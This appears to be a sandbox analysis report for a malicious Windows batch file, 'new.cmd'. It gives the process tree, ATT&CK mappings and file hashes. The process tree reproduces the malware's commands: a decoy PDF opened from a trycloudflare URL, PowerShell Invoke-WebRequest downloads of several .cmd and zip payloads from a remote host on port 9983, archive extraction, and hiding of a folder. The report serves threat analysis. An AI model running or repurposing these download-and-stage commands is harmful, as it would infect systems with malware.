Analysis

  • max time kernel
    1800s
  • max time network
    1565s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 18:31

General

  • Target

    new.cmd

  • Size

    3KB

  • MD5

    33096706975d44c7b99a1f9f49c2a8b8

  • SHA1

    9d1af5a90bb43181b486fcdd530bb076e86ea319

  • SHA256

    56bf257d93c8797219d10fcc94e0ffee4859109c8799a925f828126f1e9b12d0

  • SHA512

    18d11d3aa0470e651529a60cba53a1d33c7cd8e2eec4d76cada3f7af5829a8c59ec3e2d37262e62b9d5dad9f133e1c46e3322fb27ca5a5fd8882a4ee4ccaa56a

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Powershell Invoke Web Request.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\new.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2312
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://floor-contemporary-genius-accommodation.trycloudflare.com/VB.pdf
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2500
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2500 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:3064
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2500 CREDAT:275463 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:1784
    • C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      2⤵
      • Delays execution with timeout.exe
      PID:2636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3024
    • C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      2⤵
      • Delays execution with timeout.exe
      PID:1620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/update.cmd' -OutFile 'C:\Users\Admin\Downloads\update.cmd' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/las.cmd' -OutFile 'C:\Users\Admin\Downloads\las.cmd' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1288
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/xff.cmd' -OutFile 'C:\Users\Admin\Downloads\xff.cmd' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/zap.cmd' -OutFile 'C:\Users\Admin\Downloads\zap.cmd' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/kam.cmd' -OutFile 'C:\Users\Admin\Downloads\kam.cmd' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1372
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Python"
      2⤵
      • Views/modifies file attributes
      PID:2836

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Defense Evasion

Modify Registry

1
T1112

Hide Artifacts

1
T1564

Hidden Files and Directories

1
T1564.001

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61
    Filesize

    299B

    MD5

    5ae8478af8dd6eec7ad4edf162dd3df1

    SHA1

    55670b9fd39da59a9d7d0bb0aecb52324cbacc5a

    SHA256

    fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca

    SHA512

    a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
    Filesize

    914B

    MD5

    e4a68ac854ac5242460afd72481b2a44

    SHA1

    df3c24f9bfd666761b268073fe06d1cc8d4f82a4

    SHA256

    cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

    SHA512

    5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
    Filesize

    192B

    MD5

    41d247997ff4b8b68df09d32bbe65f5c

    SHA1

    a4aec304ab2488a8d8745099f5eb6ce847720f97

    SHA256

    18242c5dd3b9751dfab98512bb3e0e7e0f6c3232e7cc8ee6b024b6033fc0b4e4

    SHA512

    65c5d34f7dbf1c95edcf7749fd870dfaada7fd96e66f1c17bf8112446ccc02a94e1e45b28a48215a3a67b93241fb79927cb59d9e246adb4db158fbbf94a83dc8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61
    Filesize

    192B

    MD5

    b27c914cb41ddc0c62430abb0e7c989a

    SHA1

    a30fa492bb5230a804830a26e9aa36805636a025

    SHA256

    b2df4c26c17b598750059731fb90a36f044db1ccb3edf5555ca404127097de94

    SHA512

    f8ba9a71088ffac23c89797a2f4b79809369c1b969fd3b834f3889657d419e7c0d240b9fea0233358b6b372b39fbcc81dceafa403a073788d76d2007c5e42d88

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
    Filesize

    252B

    MD5

    56827a0d7736700889fdf699f5b2116b

    SHA1

    61f3124f344155c5ee08dd331d28bbf80529f240

    SHA256

    a877081a6dea94c6534de937b5e9a8ff012eb935786e091799dae6d27efb4497

    SHA512

    0483a3408331e240e4211ba7cae4f1faf7aba9531a085773a32dde0e9794b327f8b25e3456eca4253df959345239e4421c3d6db285f9a24d34fdd7401c8b48da

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    85f11af5e137746d2cb858d12bfa9991

    SHA1

    07853321fb415a033a424a0e51d42d34e5dc69e6

    SHA256

    9433148b79013c46dd2d86d29debfa463bb8d1a777ed26569c7934eadde5cfd1

    SHA512

    1d2a0b9e4dcadbd218de4541f1831b9e355e06206c6563e26d535ec557f5f6632d4f2dbf845b07aaa6153bb57fec62934d327068e26d707617cd23a08ce58b26

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    c7edb8569ef845eaf0f678b31e4aabe3

    SHA1

    339fe1a92d8117ae43eaa4aa53c2ec51a3df8cff

    SHA256

    c76708c738c78e26bfd74cea9cb7a5cd1e2a343a1304765948b1f4eea6bb7d9d

    SHA512

    c1de74545ab7ec821d0503aadfa24ed6f5fcf2044d70dc91d362e44f631928655c15ce5fed74023a408e18fe394b9f3a8608c9341d8330c03ab46177a3d9993d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    14c3489eccdb450d457d9591173bb31b

    SHA1

    b196cc1599ccdfa16c1a71bfc2870e47c101fb21

    SHA256

    58dec1abdb13c3f8b9c47223c25e439b1e324bde177abb7faf5cfa2841729746

    SHA512

    5646043892bde550a1ce95b40d9055fa725cbfea34922bfcfc96de1f7a351000bbfb2b268825b7628774b279f398eee9097880412fe060131a8ed1e54ab5887a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    a3ec0ff43a843fd2c07d1a3bbdbe3df3

    SHA1

    3d47240d5ad4c4f44c930b5d114781111275fafa

    SHA256

    24c2bc46454199dbedd8e15d8d14fb7f63e6938e779a150f6a61b83bb9e81b05

    SHA512

    3fcfa0a2a1ca203c3467703f2a5c84a14788e79dd5fbebe8b5fa7874c677d804307d3fe4aed7efc6b0973da929618c1267caa7ccd6b9f36d4db7ae9b33a33040

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    008947d9c165ec8fbd6058a2bc6dc47e

    SHA1

    420aa14bef8518b1d0090c3ae050b18b92ba40ca

    SHA256

    2bdcb2d805742b5b83cd0a2103f4af6a024af307429bf30ce4ce654bee5580fb

    SHA512

    16e0a985cc2422f76b44c0e2987aa846b764af9a10ab88c4910fb9bb3a129479f813fc0fa8d688176627e96e187ba8f1f458074811e52a38720910d2e6de535b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize

    242B

    MD5

    eedcffad9d4dc922f721611acac1c8ca

    SHA1

    c4df756db41e76811b61c87b63b6119bd40bf87d

    SHA256

    8859f8be20f1dcf4495616f56691a9acd56ad1603239cab7bdb2cdd8577c8560

    SHA512

    1ff7dc8304a1cca6a34e7b35228dd678d1f844c7ea3636b57d327978d7e7d0fecc9979f8e6e3e1c8356b3c39d9a12c2f2504c444b9a8b372946e2ed38cf53fcc

  • C:\Users\Admin\AppData\Local\Temp\Cab8825.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar8984.tmp
    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\UserCache.bin
    Filesize

    70KB

    MD5

    62a2e07ceca4e1bd129047a85e535970

    SHA1

    78f0c188864e915977e2b98f11d167d4859c7379

    SHA256

    48731eb2f2aed9f0b266a56a83eae2bb11620273f04ec6ed62708ad306656bd5

    SHA512

    badad1779e55e6ffc9763e9360bfd792e4316bedc042271aa6bd39a3d73715d8e96a5c14e1da564f4c220bb50b7cca622401e71e5b5580f0f4761e5035313e7f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    e36ab61c09d05a420e0082abbce6a9a1

    SHA1

    5fee34b63238350f2522f0ee49968d72edb83427

    SHA256

    6f598241298c156cadadade489728063c03678d8b6d16e30515899807621dcd5

    SHA512

    e97743ab45b98dcd1bd68a4f4606810f05b3998a6f26278afa20d3c193ff47b21212ecc24cfb55a4ba69989846b8228c271297ff6a46f049deaec0bd239a5b03

  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • memory/1288-250-0x000000001B230000-0x000000001B512000-memory.dmp
    Filesize

    2.9MB

  • memory/1288-251-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
    Filesize

    32KB

  • memory/1372-276-0x000000001B320000-0x000000001B602000-memory.dmp
    Filesize

    2.9MB

  • memory/1540-166-0x000000001B290000-0x000000001B572000-memory.dmp
    Filesize

    2.9MB

  • memory/1540-167-0x0000000002380000-0x0000000002388000-memory.dmp
    Filesize

    32KB

  • memory/2636-258-0x000000001B220000-0x000000001B502000-memory.dmp
    Filesize

    2.9MB

  • memory/2636-259-0x0000000002410000-0x0000000002418000-memory.dmp
    Filesize

    32KB

  • memory/2660-33-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

  • memory/2660-27-0x000007FEF628E000-0x000007FEF628F000-memory.dmp
    Filesize

    4KB

  • memory/2660-269-0x000000001B3C0000-0x000000001B6A2000-memory.dmp
    Filesize

    2.9MB

  • memory/2660-270-0x0000000001F40000-0x0000000001F48000-memory.dmp
    Filesize

    32KB

  • memory/2660-34-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

  • memory/2660-31-0x0000000002684000-0x0000000002687000-memory.dmp
    Filesize

    12KB

  • memory/2660-32-0x000000000268B000-0x00000000026F2000-memory.dmp
    Filesize

    412KB

  • memory/2660-30-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

  • memory/2660-28-0x000000001B3A0000-0x000000001B682000-memory.dmp
    Filesize

    2.9MB

  • memory/2660-29-0x0000000001EC0000-0x0000000001EC8000-memory.dmp
    Filesize

    32KB

  • memory/3024-41-0x0000000002760000-0x0000000002768000-memory.dmp
    Filesize

    32KB

  • memory/3024-40-0x000000001B1D0000-0x000000001B4B2000-memory.dmp
    Filesize

    2.9MB